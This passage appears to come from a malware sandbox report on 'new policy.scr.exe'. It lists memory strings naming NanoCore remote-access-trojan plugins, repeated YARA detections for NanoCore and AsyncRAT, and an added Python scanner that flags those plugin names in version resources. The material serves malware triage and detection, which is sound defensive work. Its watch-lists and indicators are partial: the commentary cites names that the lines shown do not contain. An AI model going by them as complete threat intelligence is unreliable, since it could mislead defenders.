Source: new policy.scr.exe, 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCoreClientPlugin.dll" vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2870782033.000000000798E000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.0000000004281000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameManagementClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNAudio.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2859613130.0000000005C30000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameLzma#.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMyClientPluginNew.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameLzma#.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMyClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNAudio.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameFileBrowserClient.dllT vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2870061029.0000000007978000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2831215910.0000000001528000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs new policy.scr.exe
Source: new policy.scr.exe Binary or memory string: OriginalFilenameOwjefxd.exe0 vs new policy.scr.exe
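Each "OriginalFilename... vs new policy.scr.exe" line is a VS_VERSIONINFO string found in memory whose value disagrees with the on-disk name. The values naming NanoCoreBase.dll and the *ClientPlugin.dll assemblies are the NanoCore plugin set unpacked in process 3, and XClient.exe sits beside the XWorm verdict in the report summary. The scanner below is an added example (my code, not the sandbox's) that reproduces this check on a raw buffer: it locates the UTF-16LE key, uses the String entry's wValueLength to handle an entry with no value (the bare "OriginalFilename vs" line above is such a case), reads the value up to its NUL terminator, and flags mismatches and watch-listed names. The buffer is constructed inside the block, not extracted from the sample. My reading of the stray trailing character in the report strings (the "4", "\"", "<", "T" after each name) is that it is the next 16-bit length field of the version resource rendered as text; the parser stops at the terminator precisely so that it never picks that up.

```python
import struct

# Assembly names taken from the OriginalFilename strings in this report; a watch-list, not a full set.
NANOCORE_PLUGIN_NAMES = {
    "nanocorebase.dll", "clientplugin.dll", "coreclientplugin.dll", "managementclientplugin.dll",
    "networkclientplugin.dll", "securityclientplugin.dll", "surveillanceclientplugin.dll",
    "surveillanceexclientplugin.dll", "toolsclientplugin.dll", "filebrowserclient.dll",
    "nanocorestresstester.dll", "myclientplugin.dll", "myclientpluginnew.dll",
}
OTHER_WATCHLIST = {"xclient.exe": "XClient.exe name seen next to the XWorm verdict in this report"}

KEY = "OriginalFilename".encode("utf-16-le") + b"\x00\x00"  # key plus its NUL terminator


def _read_utf16z(buf, off, max_chars=260):
    """Read a NUL-terminated UTF-16LE string starting at off (bounded, tolerant of truncation)."""
    chars = []
    while off + 1 < len(buf) and len(chars) < max_chars:
        w = struct.unpack_from("<H", buf, off)[0]
        if w == 0:
            break
        chars.append(chr(w))
        off += 2
    return "".join(chars)


def extract_original_filenames(buf):
    """Return (offset, value) for every OriginalFilename entry in a file or memory buffer.

    Layout of a VS_VERSIONINFO String entry: WORD wLength, WORD wValueLength, WORD wType,
    szKey (UTF-16 + NUL), DWORD padding, Value (UTF-16 + NUL). For text entries (wType 1)
    wValueLength counts WCHARs, so 0 means the entry carries no value at all.
    """
    found = []
    pos = buf.find(KEY)
    while pos != -1:
        value_len = None
        if pos >= 6:
            _w_length, value_len, w_type = struct.unpack_from("<HHH", buf, pos - 6)
            if w_type != 1:
                value_len = None  # header does not look like a text entry; fall back to scanning
        off = pos + len(KEY)
        if value_len == 0:
            value = ""
        else:
            # Tolerate one WORD of DWORD padding between key and value.
            if off + 1 < len(buf) and struct.unpack_from("<H", buf, off)[0] == 0:
                off += 2
            value = _read_utf16z(buf, off)
        found.append((pos, value))
        pos = buf.find(KEY, pos + 2)
    return found


def triage(buf, on_disk_name):
    """Flag OriginalFilename values that disagree with the on-disk name or hit the watch-list."""
    results = []
    for offset, name in extract_original_filenames(buf):
        low = name.lower()
        flags = []
        if low and low != on_disk_name.lower():
            flags.append("name mismatch")
        if low in NANOCORE_PLUGIN_NAMES:
            flags.append("NanoCore plugin name")
        if low in OTHER_WATCHLIST:
            flags.append(OTHER_WATCHLIST[low])
        results.append({"offset": offset, "original_filename": name, "flags": flags})
    return results


def _version_string(key, value):
    """Build one VS_VERSIONINFO String entry; used only to construct test data here."""
    k = key.encode("utf-16-le") + b"\x00\x00"
    v = (value.encode("utf-16-le") + b"\x00\x00") if value else b""
    body = k + b"\x00" * ((-(6 + len(k))) % 4) + v
    entry = struct.pack("<HHH", 6 + len(body), (len(value) + 1) if value else 0, 1) + body
    return entry + b"\x00" * ((-len(entry)) % 4)


# Constructed buffer standing in for a memory dump: filler, then a few String entries.
SAMPLE_DUMP = (
    b"MZ\x90\x00" + b"\xCC" * 12
    + _version_string("OriginalFilename", "NanoCoreBase.dll")
    + _version_string("OriginalFilename", "")
    + _version_string("ProductName", "Nano")
    + _version_string("OriginalFilename", "XClient.exe")
    + _version_string("OriginalFilename", "new policy.scr.exe")
)

if __name__ == "__main__":
    for hit in triage(SAMPLE_DUMP, "new policy.scr.exe"):
        print(hit)
```

Point it at a process dump rather than the PE on disk and the same function lists the embedded assemblies that only exist after unpacking, which is what turns this report's single "OriginalFilename vs" signature into the plugin inventory shown above.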
Source: new policy.scr.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7790000.18.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7790000.18.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7790000.18.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 9.2.Networks!.exe.3e7b15e.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 9.2.Networks!.exe.3e7b15e.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.Networks!.exe.3e7b15e.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7920000.22.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7920000.22.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7920000.22.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7920000.22.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7920000.22.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7920000.22.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7930000.23.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7930000.23.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7930000.23.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.77b0000.20.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.77b0000.20.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.77b0000.20.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.440a4ff.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.440a4ff.8.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.440a4ff.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7720000.14.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7720000.14.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7720000.14.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.new policy.scr.exe.7770000.17.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7770000.17.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7770000.17.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.77a0000.19.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.77a0000.19.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.77a0000.19.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.4550e57.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.44f2776.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.44f2776.4.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.44f2776.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7790000.18.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
